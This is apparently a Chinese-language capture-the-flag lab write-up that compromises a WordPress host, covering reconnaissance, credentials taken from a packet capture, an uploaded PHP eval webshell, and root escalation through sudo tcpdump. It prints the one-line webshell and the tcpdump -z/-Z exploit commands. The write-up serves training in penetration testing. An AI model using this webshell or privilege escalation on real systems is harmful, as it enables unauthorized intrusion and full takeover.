实验步骤
1、发现目标 ,找到的IP地址
2、:利用NMAP扫描目标主机,发现目标主机端口开放、服务情况
3、使用 Dirb 爆破网站目录。找到一个似乎和网络流量有关的目录(路径)。
4、若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站。
5、利用whatweb探测目标网站使用的CMS模板。截图。分析使用的CMS是什么?
清楚看到为wordpress
6、网络搜索wpscan,简要说明其功能。
WPScan是一款使用ruby编写、基于白盒测试的WordPress安全扫描器,它会尝试查找WordPress安装版的一些已知的安全弱点。WPScan可以辅助专业安全人员或是WordPress管理员评估他们的WordPress安装版的安全状况。
使用 Dirb 爆破网站目录。找到一个似乎和网络流量有关的目录(路径)。
7、浏览器访问该目录(路径),发现一个cap文件。
8、利用Wireshark分析该数据包,分析TCP数据流。找到什么有用的信息?
得到登录名和密码
9、利用上一步得到的信息进入网站后台。
(网站管理员账号与操作系统账号是不同概念)
(由于原电脑出现问题,换电脑操作)
漏洞探测和利用
上传horse,编写horse并保存为php格式
<?php @eval($_POST['shell']);phpinfo(); ?>
上传之后弹出下载错误的信息,但访问horse是可以的,
路径/wp-content/uploads/year/month/xx.php
出现phpinfo就成功了
中国蚁剑连接webshell,尝试是否可以直接访问/root/flag.txt文件,结果权限不够
但在目录中发现config.php文件,发现了MySQL数据库的用户名和密码:
11、提权查看flag.txt
用xshell连接22端口,sudo -l查看可以用的 root 命令有一个tcpdump,可以利用tcpdump进行提权
构造攻击脚本,exploit,写入shellcode,shellcode为要执行的代码,赋予可执行的权限,最后利用tcpdump执行任意命令
touch /tmp/exploit
echo ‘cat /root/flag.txt’ > /tmp/exploit
chmod +x /tmp/exploit // +x 参数表示给 exploit 文件赋予可执行权限
sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
用到的tcpdump命令:
-i eth0 从指定网卡捕获数据包
-w /dev/null 将捕获到的数据包输出到空设备(不输出数据包结果)
-z [command] 运行指定的命令
-Z [user] 指定用户执行命令
-G [rotate_seconds] 每rotate_seconds秒一次的频率执行-w指定的转储
-W [num] 指定抓包数量
tcpdump提权的原理就是利用-z和-Z,-z执行脚本,-Z指定以 root 用户执行脚本,从而提权
``-W1-G1,表示一次抓一个包,然后把这个包丢到黑洞里面,黑洞是dev/null`
tcpdump是什么
用简单的话来定义,就是:dump the traffic on a network,根据使用者的定义对网络上的数据包进行截获的包分析工具。
可以将网络中传送的数据包的“头”完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。
运行完毕拿到flag